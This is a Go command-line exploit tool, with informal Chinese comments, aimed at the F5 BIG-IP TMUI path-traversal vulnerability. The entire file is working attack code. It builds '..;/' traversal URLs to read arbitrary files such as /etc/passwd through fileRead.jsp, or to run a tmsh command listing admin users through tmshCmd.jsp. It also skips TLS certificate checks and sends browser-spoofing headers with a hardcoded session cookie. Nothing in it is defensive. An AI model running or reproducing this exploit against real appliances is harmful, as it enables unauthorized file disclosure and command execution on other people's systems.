package main

import (
	"compress/gzip"
	"crypto/tls"
	"flag"
	"fmt"
	"io"
	"net/http"
	"strings"
)

func main() {
	const readFile  string  = `/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=`
	const run__Cmd  string = `/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin`
	targetURL := flag.String("u" , "" , "Target uRl ")
	targetPot := flag.String("p" , "" , "Target Port")
	targetFile := flag.String("f" , "" , "Target File , /etc/passwd")
	attckMod  := flag.String( "m" , "r" , "attack Mode \r\n Example : >>> RunCmd / Fileread You can use R or F ")   // 定义几个见了鬼的叼毛参数，然后做个基础的判断之后再去得瑟
	flag.Parse()
	tr := &http.Transport{
		TLSClientConfig: &tls.Config{InsecureSkipVerify: true}} // 忽略https的警告，让警告去见鬼去吧。
	httpcli := &http.Client{Transport:tr}
	var fullUrl string
	if *targetPot == "0" || *targetPot > "65535"  {
		*targetPot = "443"  // 判断一下这个端口号的情况
	}
	if *attckMod == "r" || *attckMod =="R" {
		fullUrl = "https://" + *targetURL+":"+*targetPot + readFile + *targetFile //疯狂组合URL 。。。
		fmt.Println(fullUrl)
	}else if *attckMod == "c" || *attckMod == "C" {
		fullUrl = "https://" + *targetURL+":"+*targetPot + run__Cmd
	}
	req , err  := http.NewRequest("GET" , fullUrl , nil)
	if err != nil {
		panic(err)
	}
	req.Header.Add("Connection","close")
	req.Header.Add("Cache-Control","max-age=0")
	req.Header.Add("Upgrade-Insecure-Requests","1")
	req.Header.Add("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36")
	req.Header.Add("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9")
	req.Header.Add("Sec-Fetch-Site","none")
	req.Header.Add("Sec-Fetch-Mode","navigate")
	req.Header.Add("Sec-Fetch-User","?1")
	req.Header.Add("Sec-Fetch-Dest","document")
	req.Header.Add("Accept-Encoding","gzip, deflate")
	req.Header.Add("Accept-Language","en-us")
	req.Header.Add("cookie","JSESSIONID=5D5146E55787898CDCBD07D68431E991")
	getResponse , err := httpcli.Do(req)
	if err != nil {
		panic(err)
	}
	unzip , err := gzip.NewReader(getResponse.Body) // 解析 gzip的回显内容到[]byte 然后在转成string
	if err != nil {
		panic(err)
	}

	for {
		mybytes := make([]byte , 1024)
		responseBody , err := unzip.Read(mybytes)
		if err != nil && err != io.EOF {
			panic(err)
		}
		if responseBody  == 0 {
			break
		}
		if strings.Contains(string(mybytes) , "error") == true{  //打印结果了。。。
			fmt.Println("[❌ Warning ] Current Result Find Error , Can not Run This Comamin Please Check URL Or other!\r\n\r\n" , "ReadFile : " ,readFile , "\r\n", "ListUser : " , run__Cmd)
		}else {
			fmt.Printf("%s\n",mybytes)
		}

	}
}
